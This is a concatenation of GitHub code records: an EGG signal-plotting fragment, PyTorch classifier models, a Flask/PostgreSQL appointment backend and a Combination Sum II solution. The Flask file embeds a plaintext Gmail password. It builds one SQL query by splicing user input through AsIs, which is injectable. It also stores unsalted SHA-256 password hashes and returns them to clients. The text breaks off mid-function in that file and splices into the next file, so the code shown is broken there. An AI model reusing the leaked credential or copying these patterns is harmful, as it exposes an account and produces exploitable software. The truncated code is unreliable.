freqanalysis(ch_fix,fdown)\n\n\t\tplt.figure(seg)\n\t\tplt.subplot(411)\n\t\tplt.plot(t,ch2)\n\t\tplt.xlim([0,30])\n\t\t#plt.ylim([480,530])\n\t\tplt.subplot(412)\n\t\tplt.plot(ch)\n\t\t#plt.ylim([-0.2,0.2])\n\t\tplt.subplot(413)\n\t\ttfix = np.linspace(0,(1/fdown)*len(ch_fix),len(ch_fix))\n\t\tplt.plot(ch_fix)\n\t\t#plt.ylim([-0.2,0.2])\n\t\tplt.subplot(414)\n\t\tplt.plot(f,y)\n\t\t#plt.xlim([0,0.2])\n\t\t#plt.ylim([0,2])\n\n\t\tfar,psdar = AR_Spectrum(ch_fix,round(0.2*(len(ch_fix)-1)),fdown)\n\n\t\tTPpsdar = np.sum(psdar)\n\t\tpsdar = psdar/TPpsdar\n\n\t\tTPy = np.sum (y)\n\t\ty = y/TPy\n\t\t\n\n\t\t#for plot set\n\t\tmaxy1 = max(y)\n\t\tmaxy2 = max(psdar)\n\t\t\n\t\t\n\t\tmaxfind = findmax(far,0.1)\n\t\tfmax = np.argmax(psdar[:maxfind])\n\t\tprint(\"Freq Max : %.4f with value is : %.4f\" %(far[fmax],psdar[fmax]))\n\n\t\tplt.figure(1)\n\t\t\n\t\tplt.subplot(211)\n\t\t\n\t\t\n\t\tplt.plot(f,y)\n\t\tplt.fill_between(f,y,color=\"k\")\n\t\tplt.ylim([0,0.1])\n\t\tplt.xlim([0,0.3])\n\t\tplt.subplot(212)\n\t\tplt.plot(far,psdar)\t\t\n\t\tplt.fill_between(far,psdar,color=\"k\")\n\t\tplt.ylim([0,0.1])\n\t\tplt.xlim([0,0.3])\n\t\t\n\t\tcolorchange += 100\n\t\t\n\t\t#calculate the stomach PSD at interval frequency\n\t\tlow_freq = findmax(far,0.03)\n\t\thigh_freq = findmax(far,0.07)\n\t\tPSD = np.sum(psdar[low_freq:high_freq])\n\t\tprint(\"PSD on stomach = %.4f\" %PSD)\n\t\t\nplt.show()\n","repo_name":"Alvin2805/BiomedicalPython","sub_path":"EGG 
Analysis/bacatgam.py","file_name":"bacatgam.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23749104628","text":"from torch import nn\n\n\nclass ClassificationNetwork(nn.Module):\n def __init__(self, vocab_size, embed_dim, num_nodes, num_class):\n super(ClassificationNetwork, self).__init__()\n\n # self.glove_embedding = nn.EmbeddingBag.from_pretrained(\n # embedding_matrix, freeze=True\n # )\n self.embedding = nn.EmbeddingBag(vocab_size, embed_dim)\n self.dense_block = nn.Sequential(\n nn.Linear(embed_dim, num_nodes),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(num_nodes, num_class),\n )\n\n self.embedding.apply(self.init_weights)\n self.dense_block.apply(self.init_weights)\n\n def init_weights(self, layer):\n initrange = 0.5\n\n if isinstance(layer, nn.Linear or nn.EmbeddingBag):\n layer.weight.data.uniform_(-initrange, initrange)\n layer.bias.data.zero_()\n\n def forward(self, text, offsets):\n # combined_embedding = torch.cat(\n # [self.embedding(text, offsets), self.glove_embedding(text, offsets)],\n # dim=-1,\n # )\n embedded = self.embedding(text, offsets)\n return self.dense_block(embedded)\n\n\nclass RuleNetwork(nn.Module):\n def __init__(self, vocab_size, embed_dim, num_nodes, num_class):\n super(RuleNetwork, self).__init__()\n\n self.embedding = nn.EmbeddingBag(vocab_size, embed_dim, sparse=False)\n self.MLP = nn.Sequential(\n nn.Linear(embed_dim, num_nodes[0]),\n nn.LayerNorm(num_nodes[0]),\n nn.ReLU(),\n # nn.Dropout(),\n nn.Linear(num_nodes[0], num_nodes[1]),\n nn.LayerNorm(num_nodes[1]),\n nn.ReLU(),\n # nn.Dropout(),\n nn.Linear(num_nodes[1], num_class),\n )\n\n self.embedding.apply(self.init_weights)\n self.MLP.apply(self.init_weights)\n\n def init_weights(self, layer):\n initrange = 0.5\n\n if isinstance(layer, nn.Linear or nn.EmbeddingBag):\n layer.weight.data.uniform_(-initrange, initrange)\n layer.bias.data.zero_()\n\n def forward(self, text, offsets):\n embedded = self.embedding(text, offsets)\n return self.MLP(embedded)\n","repo_name":"IndominousRex/dep_project_RB","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5724616990","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport urllib.parse as up\n\nfrom flask_mail import Mail, Message\n\nfrom flask import Flask,request\nfrom flask import jsonify\nfrom flask_cors import CORS\n\nimport os\nfrom os.path import join\nfrom dotenv import load_dotenv\n\nimport hashlib\n\ndotenv_path = join(os.path.dirname(os.path.realpath(__file__)), '.env')\nload_dotenv(dotenv_path)\n\nDATABASE_URL = os.environ.get(\"DATABASE_URL\")\nup.uses_netloc.append(\"postgres\")\nurl = up.urlparse(DATABASE_URL)\ndbconn = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\napp= Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\napp.config.from_mapping(\n DATABASE= \"NITC-ApptMgmt\"\n)\n\n#########################################################################################################################\n\n\"\"\" cursor = dbconn.cursor()\ncursor.execute(\"SELECT * from Appointments\")\nprint(cursor.fetchall())\ndbconn.commit() \"\"\"\n\nmail = Mail(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 
'nitc.email.bot@gmail.com'\napp.config['MAIL_PASSWORD'] = 'EMBySGxAcR9xsgV'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\n\n\n@app.route(\"/\")\ndef index():\n msg = Message('Hello from flask', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = \"Hello Flask message sent from Flask-Mail\"\n mail.send(msg)\n response = jsonify(message=\"The server is running and mail is send\")\n return response\n\n#########################################################################################################################\n#Signs-in the users (admin,faculty,student)\n@app.route(\"/signin\",methods=[\"POST\"])\ndef signinpage():\n cursor = dbconn.cursor()\n \"\"\" {\n \"u_id\":\"B190SDtestCS\",\n \"pwd\":\"SDtestPass\",\n \"type\":\"student\"\n } \"\"\"\n uids= request.json['u_id']\n password= request.json['pwd']\n typess= request.json['type']\n\n #password encryption:\n password=hashlib.sha256(password.encode('utf-8')).hexdigest() #hashvalue\n\n cursor.execute(\"SELECT pwd from Users where u_id=%s\",(uids,))\n x=cursor.fetchone()\n if x is None:\n return jsonify(message=\"Complete the registration\")\n\n temp= x[0]\n dbconn.commit()\n\n\n if temp:\n passcode=temp\n if passcode==password:\n if typess=='student':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT deptid from Student where roll_no=%s\",(uids,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT dname from Departments where department_id=%s\",(deptids,))\n depts= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='faculty':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT deptid from Faculty where ssn=%s\",(uids,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT dname from Departments where department_id=%s\",(deptids,))\n depts= cursor.fetchone()[0]\n dbconn.commit()\n\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='admin':\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Users where u_id=%s\",(uids,))\n dbconn.commit()\n tempone= cursor.fetchone()\n uids,names,emails,password,mobilenos=tempone\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos})\n else:\n return jsonify(message=\"Incorrect Password\")\n\n#########################################################################################################################\n\n#Admin signs-up the users(faculty, student) into the DB.\n@app.route(\"/signup\",methods=[\"POST\"])\n#@app.route(\"/signup\")\ndef registration():\n\n cursor = dbconn.cursor()\n uids= request.json['u_id']\n names= request.json['uname'] #name\n emails= request.json['email']\n password= request.json['pwd']\n mobilenos= request.json['mobileno']\n depts= request.json['dname']\n typess= request.json['type']\n\n #uids= 
'1234567'\n #names= 'SDtestName'\n #emails= 'SDtestName@gmail.com'\n #password= 'SDtestPass'\n #mobilenos= '1239991111'\n #depts= 'CSE'\n #typess= 'student'\n\n #password encryption:\n password=hashlib.sha256(password.encode('utf-8')).hexdigest() #hashvalue\n\n #insert data into user db\n cursor.execute(\"INSERT INTO Users (u_id, uname, email, pwd, mobileno) VALUES(%s, %s, %s, %s, %s)\",(uids, names, emails, password, mobilenos))\n dbconn.commit()\n\n #getting dept id from department db\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT department_id from Departments where dname=%s\",(depts,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n if typess=='student':\n cursor = dbconn.cursor()\n cursor.execute(\"INSERT INTO Student (roll_no, deptid) VALUES(%s, %s)\",(uids, deptids))\n dbconn.commit()\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='faculty':\n cursor = dbconn.cursor()\n cursor.execute(\"INSERT INTO Faculty (ssn, deptid) VALUES(%s, %s)\",(uids, deptids))\n dbconn.commit()\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n#########################################################################################################################\n\n#Gets the fac_id and name of all the faculties\n@app.route(\"/list_all_fac\",methods=[\"POST\"])\n#@app.route(\"/list_all_fac\")\ndef listAllFacPage():\n cursor = dbconn.cursor()\n list_of_uname=[]\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT u.u_id,u.uname FROM Users u, Faculty f WHERE u.u_id=f.ssn\")\n list_of_uname=cursor.fetchall()\n response=list(map(lambda x: {\"u_id\":x[0],\"uname\":x[1]},list_of_uname))\n dbconn.commit()\n\n return jsonify(response)\n\n#########################################################################################################################\n\n#Gets all the ids and names of the departments\n@app.route(\"/list_all_departments\",methods=[\"POST\"])\n#@app.route(\"/list_all_fac\")\ndef listAllDeptPage():\n cursor = dbconn.cursor()\n list_of_uname=[]\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT department_id,dname from Departments\")\n list_of_dname=cursor.fetchall()\n response=list(map(lambda x: {\"dept_id\":x[0],\"dname\":x[1]},list_of_dname))\n dbconn.commit()\n\n return jsonify(response)\n\n#########################################################################################################################\n\n#Gets details of a specific user\n@app.route(\"/details\",methods=[\"POST\"])\n#@app.route(\"/details\")\ndef details():\n cursor = dbconn.cursor()\n uid= request.json['u_id']\n cursor.execute(\"SELECT * FROM Users WHERE u_id=%s\",(uid,))\n details=cursor.fetchone()\n dbconn.commit()\n\n cursor.execute(\"SELECT COUNT(*) FROM Student WHERE roll_no=%s\",(uid,))\n isStudent=cursor.fetchone()[0]\n dbconn.commit()\n if isStudent:\n cursor.execute(\"SELECT deptid FROM Student WHERE roll_no=%s\",(uid,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n else:\n cursor.execute(\"SELECT deptid FROM Faculty WHERE ssn=%s\",(uid,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT dname FROM Departments WHERE department_id=%s\",(deptids,))\n deptname= cursor.fetchone()[0]\n dbconn.commit()\n if details:\n u_id,names,emails,password,mobilenos=details\n return 
jsonify({\"u_id\":u_id,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"dname\":deptname})\n else:\n return jsonify(message=\"Invalid ID\")\n\n#########################################################################################################################\n\n#insert the appointment into the appointments DB and saves the state as 'pending'\n@app.route(\"/request_stud\",methods=[\"POST\"])\n#@app.route(\"/request_stud\")\ndef request_stud():\n cursor = dbconn.cursor()\n\n #date_created = \"2020-12-03\"\n #date_appointment = \"2020-12-31\"\n #time_appointment = \"10:00:00\"\n #title = \"email test\"\n #description = \"email test des\"\n #stud_id = \"B190CS\"\n #fac_id = \"667\"\n\n date_created= request.json['date_created']\n date_appointment= request.json['date_appointment']\n time_appointment= request.json['time_appointment']\n title= request.json['title']\n description= request.json['description']\n stud_id= request.json['stud_id']\n fac_id= request.json['fac_id']\n dateTime = date_appointment + \"#\" + time_appointment\n\n\n # we are concatinating the date and time to get the datetime\n # because our database only has one column for datetime\n\n #status will be 1 for pending\n try:\n cursor.execute(\"INSERT INTO Appointments (status, date_created, date_scheduled, title, decription, stu_id, fac_id) VALUES(%s, %s, %s, %s, %s, %s, %s)\",(\"1\", date_created, dateTime, title, description, stud_id, fac_id))\n dbconn.commit()\n\n except:\n return jsonify(message=\"Invalid appointment request\")\n\n #sending email to the faculty\n cursor.execute(\"SELECT email from Users where u_id=%s\",(fac_id,))\n email=cursor.fetchone()[0]\n dbconn.commit()\n\n cursor.execute(\"SELECT uname from Users where u_id=%s\",(stud_id,))\n stud_name=cursor.fetchone()[0]\n dbconn.commit()\n\n msg = Message(f'{stud_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{email}'])\n msg.body = f'{stud_name} has requested an appointment with you.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n\n\n return jsonify(message=\"Appointment Requested\")\n\n#########################################################################################################################\n\n#Gets details of an appointment\n@app.route(\"/get_appt\",methods=[\"POST\"])\ndef get_appt():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='20'\n valid=-1\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n valid=cursor.fetchone()\n dbconn.commit()\n appointment_id,status,date_created,dateTime,title,decription,stu_id,fac_id,suggested_date,faculty_message = valid\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()[0]\n dbconn.commit()\n date_scheduled,time_scheduled = dateTime.split(\"#\")\n if valid:\n return jsonify({\"appointment_id\":appointment_id,\"status\":status,\"date_created\":date_created,\"date_scheduled\":date_scheduled,\"time_scheduled\":time_scheduled,\"title\":title,\"decription\":decription,\"suggested_date\":suggested_date,\"faculty_message\":faculty_message,\"stu_name\":stu_name,\"fac_name\":fac_name})\n else:\n return jsonify(message=\"Error: appointment doesn't 
exist\")\n\n#########################################################################################################################\n\n#Deletes an appointment from the DB\n@app.route(\"/delete_appt\",methods=[\"DELETE\"])\n#@app.route(\"/delete_appt\")\n\ndef delete_appt():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='20'\n valid=-1\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n valid=cursor.fetchone();\n dbconn.commit()\n if valid:\n cursor.execute(\"DELETE from Appointments where appointment_id=%s\",(appt_id,))\n dbconn.commit()\n return jsonify(message=\"deleted\")\n else:\n return jsonify(message=\"Error: appointment doesn't exist\")\n\n#########################################################################################################################\n\n#Rejects an appointment and saves the appointment state as 'rejected'\n@app.route(\"/reject_stud\",methods=[\"POST\"])\n#@app.route(\"/reject_stud\")\ndef reject_stud():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='19'\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n appointment_id, status, date_created, dateTime, title, decription, stu_id, fac_id, suggested_date, faculty_message = cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"UPDATE Appointments SET status='2' where appointment_id=%s\",(appt_id,))\n dbconn.commit()\n date_scheduled,time_scheduled = dateTime.split(\"#\")\n\n #get the email, name of the student and faculty\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(fac_id,))\n fac_email, fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(stu_id,))\n stu_email, stu_name=cursor.fetchone()\n dbconn.commit()\n\n\n if status == '1':\n #send a mail to the student with the message that the appointment has been rejected\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n msg.body = f'Your appointment with {fac_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {date_scheduled}\\nTime: {time_scheduled}\\n\\nPlease login to the portal to make another appointment.'\n mail.send(msg)\n else:\n #send a mail to the faculty with the message that the appointment has been rejected\n msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{fac_email}'])\n #msg.body = f'Your appointment with {stu_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {dateTime}\\n\\nPlease login to the portal to make another appointment.'\n msg.body = f'Your appointment with {stu_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {date_scheduled}\\nTime: {time_scheduled}\\n\\nPlease login to the portal to make another appointment.'\n mail.send(msg)\n return jsonify({\"appt_id\":appt_id,\"status\":2})\n\n#########################################################################################################################\n\n#Approves an appointment by saving the appt state as 'accepted'\n@app.route(\"/approval_stud\",methods=[\"POST\"])\n#@app.route(\"/approval_stud\")\ndef approval_stud():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='10'\n cursor.execute(\"SELECT status, stu_id, fac_id, title, suggested_date, date_scheduled, decription FROM Appointments WHERE appointment_id=%s;\",(appt_id,))\n status, stu_id, fac_id, title, dateTime, 
dateTime2, description=cursor.fetchone()\n dbconn.commit()\n #print(dateTime, dateTime2)\n if status==\"4\" and dateTime!='-1':\n date_appointment,time_appointment = dateTime.split(\"#\")\n else:\n date_appointment,time_appointment = dateTime2.split(\"#\")\n #print(status, stu_id, fac_id)\n\n #get the email of the student and faculty\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(stu_id,))\n stu_email, stu_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(fac_id,))\n fac_email, fac_name=cursor.fetchone()\n #print(fac_email, fac_name)\n dbconn.commit()\n if (status==\"4\"):\n # we are here means the faculty asked for a reschedule\n # and student is approving the reschedule\n cursor.execute(\"UPDATE Appointments SET status='3', date_scheduled=suggested_date, suggested_date=-1,faculty_message=NULL WHERE appointment_id=%s;\",(appt_id,))\n dbconn.commit()\n\n #send email to the faculty that the student has approved the reschedule\n msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{fac_email}'])\n #msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = f'{stu_name} has approved the reschedule request for the appointment.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n else:\n cursor.execute(\"UPDATE Appointments SET status='3' WHERE appointment_id=%s ;\",(appt_id,))\n dbconn.commit()\n\n #send email to the student that the appointment has been approved\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n #msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = f'{fac_name} has approved the appointment request for you.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n\n return jsonify({\"appt_id\":appt_id,\"status\":3})\n\n#########################################################################################################################\n\n#Sends all the appointments of a student\n@app.route(\"/view_all_student\",methods=[\"POST\"])\n#@app.route(\"/view_all\")\ndef view_all_student():\n # takes in the admin id\n u_id= request.json['u_id']\n cursor=dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where stu_id=%s ORDER by date_scheduled\",(u_id,))\n list_of_apt=cursor.fetchall()\n dbconn.commit()\n if not list_of_apt:\n return jsonify(message2=\"There are no appointments\")\n\n list_of_apt_details=[]\n for i in list_of_apt:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = i\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()\n dbconn.commit()\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n list_of_apt_details.append({\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, 
\"stu_id\": stu_id, \"stu_name\":stu_name,\"fac_id\": fac_id, \"fac_name\": fac_name, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message})\n return jsonify(list_of_apt_details)\n\n\n######################################## FACULTY STUFF #########################################\n\n#Sends all appointments related to the faculty\n@app.route(\"/view_all_faculty\",methods=[\"POST\"])\n#@app.route(\"/view_all\")\ndef view_all_faculty():\n # takes in the faculty id\n u_id= request.json['u_id']\n cursor=dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where fac_id=%s ORDER by date_scheduled\",(u_id,))\n list_of_apt=cursor.fetchall()\n dbconn.commit()\n if not list_of_apt:\n return jsonify(message2=\"There are no appointments\")\n\n list_of_apt_details=[]\n for i in list_of_apt:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = i\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()\n dbconn.commit()\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n list_of_apt_details.append({\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, \"stu_id\": stu_id, \"stu_name\":stu_name,\"fac_id\": fac_id, \"fac_name\": fac_name, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message})\n return jsonify(list_of_apt_details)\n\n#########################################################################################################################\n\n#Reschedules an appointment by changing the appt state to 'rescheduled'\n#@app.route(\"/reschedule\")\n@app.route(\"/reschedule\", methods=[\"POST\"])\ndef reschedule():\n\n cursor = dbconn.cursor()\n\n fac_id= request.json['u_id']\n apt_id= request.json['apt_id']\n fac_msg=request.json['fac_msg']\n suggested_date=request.json['suggested_date']\n suggested_time=request.json['suggested_time']\n\n #fac_id= '123'\n #apt_id= '12'\n #fac_msg='busy'\n #suggested_date='2020-12-07'\n #suggested_time='17:00:00'\n\n status='4' #default value\n\n suggested_datetime=suggested_date+\"#\"+suggested_time\n cursor.execute(\"UPDATE Appointments SET suggested_date=%s,faculty_message=%s,status=%s where fac_id=%s and appointment_id=%s\",(suggested_datetime,fac_msg,status,fac_id,apt_id))\n dbconn.commit()\n cursor.execute(\"SELECT * from Appointments where fac_id=%s and appointment_id=%s\",(fac_id,apt_id))\n resc_apt=cursor.fetchone()\n dbconn.commit()\n if not resc_apt:\n return jsonify(message=\"There are no appointments\")\n else:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = resc_apt\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n resc_apt={\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, \"stu_id\": stu_id, \"fac_id\": fac_id, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message}\n cursor.execute(\"SELECT uname from Users where u_id=%s;\",(fac_id,))\n fac_name=cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT email from Users where u_id=%s;\",(stu_id,))\n 
stu_email=cursor.fetchone()[0]\n dbconn.commit()\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n msg.body = f'{fac_name} has asked to reschedule your request for an appointment.\\n\\nTitle: {title}\\nDescription: {description}\\nOld date: {date_scheduled}\\nOld time: {time_scheduled}\\nto-\\nNew date: {suggested_date}\\nNew time: {suggested_time}\\nFaculty message: {faculty_message}\\n\\nPlease login to the portal to accept or reject the suggestion.'\n mail.send(msg)\n return jsonify(resc_apt)\n\n##################################################################################################\n\n#api to accept the appointment by saving the appt state as 'accepted'\n@app.route(\"/accept\",methods=[\"POST\"])\ndef accept():\n # takes in the appointment id\n apt_id= request.json['apt_id']\n #apt_id=\"2233asdfasd3\"\n try:\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where appointment_id=%s\",(apt_id,))\n apt_details=cursor.fetchone()\n except:\n return jsonify(message=\"Invalid apt_id\")\n if apt_details is None:\n return jsonify(message=\"No appointment with this id\")\n appointment_id, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = apt_details\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n\n #UPdate the status to 3 for accepted if the current status is 1\n if status == \"1\":\n cursor = dbconn.cursor()\n cursor.execute(\"UPDATE Appointments SET status=%s WHERE appointment_id=%s\",(\"3\",apt_id))\n dbconn.commit()\n return jsonify(\n {\n \"message\":\"Appointment Accepted\",\n },\n {\n appointment_id: {\n \"status\": \"3\",\n \"date_created\": date_created,\n \"date_scheduled\": date_scheduled,\n \"time_scheduled\": time_scheduled,\n \"title\": title,\n \"description\": description,\n \"stu_id\": stu_id,\n \"fac_id\": fac_id,\n \"suggested_date\": suggested_date,\n \"faculty_message\": faculty_message\n }\n }\n )\n elif status == \"3\":\n return jsonify(message=\"Appointment already accepted\")\n elif status == \"2\":\n return jsonify(message=\"Appointment already rejected\")\n else:\n return jsonify(message=\"Appointment waiting for student aproval\")\n return jsonify(message=\"this will never be seen Appointment Accepted\")\n\n\n##################################################################################################\n\n#List all the appointments related to a faculty in a particular month of a year\n@app.route(\"/apt_by_month\",methods=[\"POST\"])\ndef apt_by_month():\n def getmonthlength(monthnum,yearnum):\n if monthnum in [1,3,5,7,10,12]:\n return 31\n elif monthnum in [4,6,8,9,11]:\n return 30\n else:\n if((yearnum % 400 == 0) or (yearnum % 100 != 0) and (yearnum % 4 == 0)):\n return 29\n else:\n return 28\n cursor=dbconn.cursor()\n \"\"\" {\n \"fac_id\":\"123\",\n \"month\":\"12\",\n \"year\" : \"2020\"\n } \"\"\"\n fac_id=request.json[\"fac_id\"]\n month=request.json[\"month\"]\n year=request.json[\"year\"]\n perc='%'\n cursor.execute(\"SELECT * FROM Appointments WHERE fac_id=%s AND status='3' AND date_scheduled LIKE '%s-%s-%s' ORDER BY date_scheduled\",(fac_id,AsIs(year),AsIs(month),AsIs(perc)))\n all_appts_of_month=cursor.fetchall()\n dbconn.commit()\n weekarr=[]\n montharr=[]\n dayarr=[]\n weekcount=0\n index=0\n length= getmonthlength(int(month),int(year));\n print(\"monthlength: \",length)\n for daycount in range(length):\n if (daycount%7==0 and daycount!=0):\n 
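Editor's note on `getmonthlength` inside the `apt_by_month` handler above: August (month 8) is filed in the 30-day list even though it has 31 days, so every August schedule grid is one day short, and the hand-rolled leap-year test is easy to break when edited. The standard library already provides both; a sketch (not wired into the app):

```python
import calendar

def get_month_length(month: int, year: int) -> int:
    # monthrange returns (weekday of the 1st, number of days in the month)
    return calendar.monthrange(year, month)[1]

assert get_month_length(8, 2021) == 31   # August has 31 days, not 30
assert get_month_length(2, 2020) == 29   # leap years handled for free
```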
montharr.append(weekarr)\n            weekarr=[]\n            weekcount+=1\n\n    while index List[List[int]]:\n        #If the previous candidate at this depth equals the current one, skip this branch to avoid duplicate combinations.\n        candidates.sort()\n        res = []\n        def backtrack(cur, index, target):\n            if target <= 0:\n                if target == 0:\n                    res.append(cur.copy())\n                return\n\n            for i in range(index, len(candidates)):\n                if i > index and candidates[i] == candidates[i-1]:\n                    continue\n                cur.append(candidates[i])\n                backtrack(cur, i+1, target-candidates[i])\n                cur.pop()\n\n        backtrack([], 0, target)\n        return res\n","repo_name":"llunaB/algorithmn","sub_path":"0502_알고리즘-recursion,backtracking/40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
